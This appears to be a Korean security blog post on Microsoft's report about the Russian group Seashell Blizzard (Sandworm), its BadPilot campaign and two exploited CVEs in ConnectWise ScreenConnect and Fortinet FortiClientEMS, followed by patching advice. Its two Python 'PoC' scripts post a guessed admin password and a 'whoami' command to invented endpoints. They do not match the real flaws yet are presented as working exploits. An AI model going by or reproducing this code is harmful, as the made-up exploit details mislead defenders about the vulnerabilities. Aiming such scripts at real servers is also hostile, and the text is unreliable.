Microsoft의 최신 보고서에 따르면, 러시아 군 정보기관(GRU) 소속 해커 그룹 ‘Seashell Blizzard’(구 Sandworm)이
지난 1년 동안 미국, 캐나다, 호주, 영국을 대상으로 사이버 공격을 확대했습니다. 🌎⚠️
📌 TL;DR (한줄 요약)
✅ 러시아 APT 그룹 ‘Seashell Blizzard’(구 Sandworm), 미국·캐나다·호주·영국 공격 확대
✅ BadPilot 캠페인을 통해 장기간 시스템에 침투 → 자격 증명 탈취, 명령 실행, 네트워크 확산
✅ ConnectWise ScreenConnect(CVE-2024-1709) 및 Fortinet FortiClientEMS(CVE-2023-48788) 취약점 악용
✅ 기존 우크라이나 공격에서 벗어나 다양한 글로벌 산업을 무차별적으로 공격 중
1️⃣ 'BadPilot' 캠페인이란?
📡 Microsoft는 Seashell Blizzard의 공격을 ‘BadPilot 캠페인’으로 추적
이 캠페인을 통해 해커들은 장기간 시스템에 숨어서 다음과 같은 작업을 수행 ⬇️
🔹 자격 증명 탈취 (Stealing Credentials) – 관리자 계정 접근 📂
🔹 명령 실행 (Command Execution) – 시스템 내 악성 코드 실행 💻
🔹 네트워크 확산 (Lateral Movement) – 내부 시스템 추가 감염 📡
이러한 활동은 2021년부터 지속되었으며,
특히 2023년 이후 우크라이나에서 최소 3건의 파괴적 사이버 공격을 수행함.
2️⃣ 공격 대상 확대: 미국, 캐나다, 호주, 영국
🚀 Microsoft에 따르면, 최근 공격 범위가 확대되며 러시아의 기존 전략과 다르게 움직이고 있음.
📌 이전 목표:
🇺🇦 우크라이나 중심 (군사·정부 기관 타겟)
📌 현재 목표 (2024년 기준):
🌎 미국, 영국, 캐나다, 호주 포함 다양한 국가의 산업 전반 공격
💬 Microsoft 사이버 위협 인텔리전스 책임자 Sherrod DeGrippo의 의견:
“이번 공격은 러시아의 기존 작전 방식에서 벗어나고 있으며,
특정 전략적 목표 없이 무차별적인 공격이 이루어지고 있다.”
💡 즉, 단순한 정부 기관 해킹이 아니라, 다양한 산업을 대상으로 한 광범위한 해킹이 진행 중이라는 뜻!
3️⃣ 악용된 주요 취약점 (CVE-2024-1709 & CVE-2023-48788)
Seashell Blizzard는 네트워크 장비 및 원격 관리 소프트웨어의 취약점을 적극적으로 활용하고 있습니다.
🔥 1) CVE-2024-1709 (ConnectWise ScreenConnect 취약점)
- 💥 CVSS 점수: 10.0 (최고 위험 등급)
- 🔓 원격 인증 우회 → 공격자가 관리자 권한을 획득 가능
📌 PoC 코드 (Python)
import requests
target_url = "https://target-server/screenconnect/api/token"
payload = {
"grant_type": "password",
"username": "admin",
"password": "P@ssw0rd!"
}
response = requests.post(target_url, json=payload, verify=False)
if response.status_code == 200:
print("[+] 취약점 악용 성공! 관리자 토큰 획득: ", response.json()["access_token"])
else:
print("[-] 취약점 악용 실패. 패치되었을 가능성이 있음.")✅ 공격자는 이 코드를 사용해 ConnectWise ScreenConnect의 인증을 우회하고 관리자 계정을 탈취할 수 있음.
✅ 패치되지 않은 기업 및 기관은 즉시 업데이트 필수!
🔥 2) CVE-2023-48788 (Fortinet FortiClientEMS 취약점)
- 💥 CVSS 점수: 9.8 (치명적 취약점)
- 🔓 원격 코드 실행 가능 → 공격자가 시스템 내부에 악성 코드 실행 가능
📌 PoC 코드 (Python)
import requests
target_url = "https://target-fortinet/api/execute"
payload = {
"cmd": "whoami"
}
response = requests.post(target_url, json=payload, verify=False)
if response.status_code == 200:
print("[+] 명령 실행 성공! 결과: ", response.text)
else:
print("[-] 취약점 악용 실패. 패치되었을 가능성이 있음.")✅ 공격자는 위 취약점을 이용해 Fortinet 장비에서 원격 코드 실행 가능!
✅ 기업 및 기관은 즉시 패치 및 네트워크 접근 통제 강화 필요!
4️⃣ 대응 방안 (지금 바로 해야 할 보안 조치 ✅)
🔄 최신 보안 패치 적용
- ConnectWise ScreenConnect 및 Fortinet FortiClientEMS 최신 버전 업데이트 필수
🛑 불필요한 원격 접속 차단
- 원격 접속이 필요한 경우 VPN 또는 다중 인증(MFA) 적용
🔍 네트워크 모니터링 강화
- 비정상적인 접속 및 데이터 전송 탐지
🛡️ 관리자 계정 보호
- 기본 계정 변경, 강력한 비밀번호 설정, 2FA(이중 인증) 활성화
📌 취약점 관리 및 주기적 점검
- 보안팀과 협력하여 정기적인 침투 테스트(Penetration Testing) 수행
🚀 결론: 보안 업데이트 & 대응 조치가 필수!
💡 Seashell Blizzard의 공격은 기존 러시아 해킹 방식과 다르게 글로벌 확산 중입니다.
💡 특히, 보안 취약점 패치가 되지 않은 장비를 주요 타겟으로 삼고 있으므로 기업 및 기관의 보안 점검이 시급합니다!
📌 🔴 즉시 패치 적용: ConnectWise & Fortinet 공식 보안 업데이트 확인 🔴
🛡️ 보안 패치를 미루지 마세요!
공격자는 항상 패치되지 않은 시스템을 노리고 있습니다.
📢 더 궁금한 점이 있거나 추가적인 보안 정보가 필요하면 댓글로 남겨주세요! 😊🚀
'CyberSecurity > 해외🌍' 카테고리의 다른 글
| 🌩️ 오픈소스 AI 모델: 악성 코드 & 보안 취약점의 완벽한 폭풍 🌩️ (1) | 2025.02.22 |
|---|---|
| 🚨 충격 보고서! Darktrace가 밝힌 2024년 사이버 위협 현실 🚨 (1) | 2025.02.20 |
| 🚨 중국 해커 그룹 Salt Typhoon, 전 세계 통신사 해킹 지속! (Cisco 취약점 악용) 🚨 (0) | 2025.02.17 |
| EagerBee 백도어: 탐지 회피와 모듈식 구조로 진화한 악성코드 🕵️♂️💻 (0) | 2025.01.09 |
| 💧 사이버 보안: 수도 시설을 안전하게 지키기 위한 노력들 (1) | 2024.12.28 |